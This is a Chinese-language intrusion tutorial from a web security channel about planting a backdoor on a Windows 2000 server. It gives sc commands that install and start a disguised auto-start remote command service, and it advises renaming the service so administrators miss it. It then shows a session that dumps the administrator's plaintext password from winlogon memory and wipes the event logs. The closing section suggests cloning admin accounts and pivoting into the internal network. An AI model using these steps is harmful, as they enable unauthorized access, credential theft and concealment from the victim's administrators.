网络安全 频道

入侵Windows2000系统放置后门的方法

Msvcp60.dll vc的运行库,这个东西其实不是必须的,但为了防止在某些缺少Msvcp60.dll的机上在运行Clealog清除日志时对方的机上会突然弹出一个对话框说缺少Msvcp60.dll的尴尬情况,最好把它一起复制过去。

c:\>sc \\xxx.xxx.xxx.xxx create "Remote Command Service" binpath= 

c:\winnt\system32\rcmdsvc.exe type= own start= auto

在这里我们用sc在目标机xxx.xxx.xxx.xxx上创建了一个名为Remote Command Service的服务,启动方式为自动。当然为了隐蔽,你最好把“Remote Command Service”这个服务名改成其它比较类似系统服务的名字,毕竟管理员不可能看着一个突然多出来的Remote Command而坐视不管,而且也显的你太嚣张了。

PS:sc.exe是Windows2000 Resource Kit中一个功能非常强大的对服务进行控制的工具,详细的使用方法可以参考本站的《SC使用完全指南》。

c:\>sc \\xxx.xxx.xxx.xxx start "Remote Command Service"



SERVICE_NAME: rpc support services

TYPE : 10 WIN32_OWN_PROCESS

STATE : 2 START_PENDING

(NOT_STOPPABLE,NOT_PAUSABLE,

IGNORES_SHUTDOWN)

WIN32_EXIT_CODE : 0 (0x0)

SERVICE_EXIT_CODE : 0 (0x0)

CHECKPOINT : 0x0

WAIT_HINT : 0x7d0



/*在这里我们用sc启动刚才创建的Remote Command Service服务。*/ 



/*下面连上对方服务器*/



c:\>rcmd



Enter Server Name : xxx.xxx.xxx.xxx

Connect to \\xxx.xxx.xxx.xxx



Microsoft Windows 2000 [Version 5.00.2195]

(C) Copyright 1985-1999 Microsoft Corp.



C:\Documents and Settings\Default User.WINNT>pulist



Process PID User

Idle 0

System 8

smss.exe 168 NT AUTHORITY\SYSTEM

csrss.exe 192 NT AUTHORITY\SYSTEM

winlogon.exe 212 NT AUTHORITY\SYSTEM

services.exe 240 NT AUTHORITY\SYSTEM

lsass.exe 252 NT AUTHORITY\SYSTEM

svchost.exe 408 NT AUTHORITY\SYSTEM

spoolsv.exe 436 NT AUTHORITY\SYSTEM

msdtc.exe 464 NT AUTHORITY\SYSTEM

svchost.exe 596 NT AUTHORITY\SYSTEM

llssrv.exe 624 NT AUTHORITY\SYSTEM

regsvc.exe 676 NT AUTHORITY\SYSTEM

rpcsvc.exe 692 NT AUTHORITY\SYSTEM

mstask.exe 716 NT AUTHORITY\SYSTEM

LSESS.EXE 792 NT AUTHORITY\SYSTEM

tlntsvr.exe 832 NT AUTHORITY\SYSTEM

VrUpSvr.exe 956 NT AUTHORITY\SYSTEM

winmgmt.exe 968 NT AUTHORITY\SYSTEM

dns.exe 980 NT AUTHORITY\SYSTEM

dfssvc.exe 1064 NT AUTHORITY\SYSTEM

POP3S.exe 1100 NT AUTHORITY\SYSTEM

smtpds.exe 1120 NT AUTHORITY\SYSTEM

svchost.exe 1384 NT AUTHORITY\SYSTEM

dllhost.exe 1316 NT AUTHORITY\SYSTEM

internat.exe 1308 SERVER\Administrator

conime.exe 1680 SERVER\Administrator

VRMONSVC.EXE 872 NT AUTHORITY\SYSTEM

inetinfo.exe 1456 NT AUTHORITY\SYSTEM

explorer.exe 1548 SERVER\Administrator

cmd.exe 1712 SERVER\Guest

pulist.exe 532 SERVER\Guest



/*我们可以看到winlogon.exe的进程号是212*/



C:\Documents and Settings\Default User.WINNT>findpass server 

administrator 212



To Find Password in the Winlogon process

Usage: fidp DomainName UserName PID-of-WinLogon



The debug privilege has been added to PasswordReminder.

The WinLogon process id is 214 (0x000000d6).

To find server\administrator password in process 214 ...

The encoded password is found at 0x01a00800 and has a length of 3.

The logon information is: server/administrator/Tgrh87fd.

The hash byte is: 0xb8.



/*在winlogon中查找administrator的名文口令*/



C:\Documents and Settings\Default User.WINNT>clealog

clealog done



/*清除日志记录*/



C:\Documents and Settings\Default User.WINNT>

到这里我们已经看到Administrator的密码是Tgrh87fd。

至此我们拿到了管理员的密码并安放了一个Rcmdsvc的后门,当然你还可以接着做许多事。比如利用Adam发现的Bug再克隆一个管理员账号。或者用SC把对方的Tlntsvr服务启起来。不过后者比较容易被发现,不推荐。如果你对他的内网的某台机感兴趣而且该机也有漏洞,可以用Fpipe做端口重定向后为下一步的进攻做准备。

0
相关文章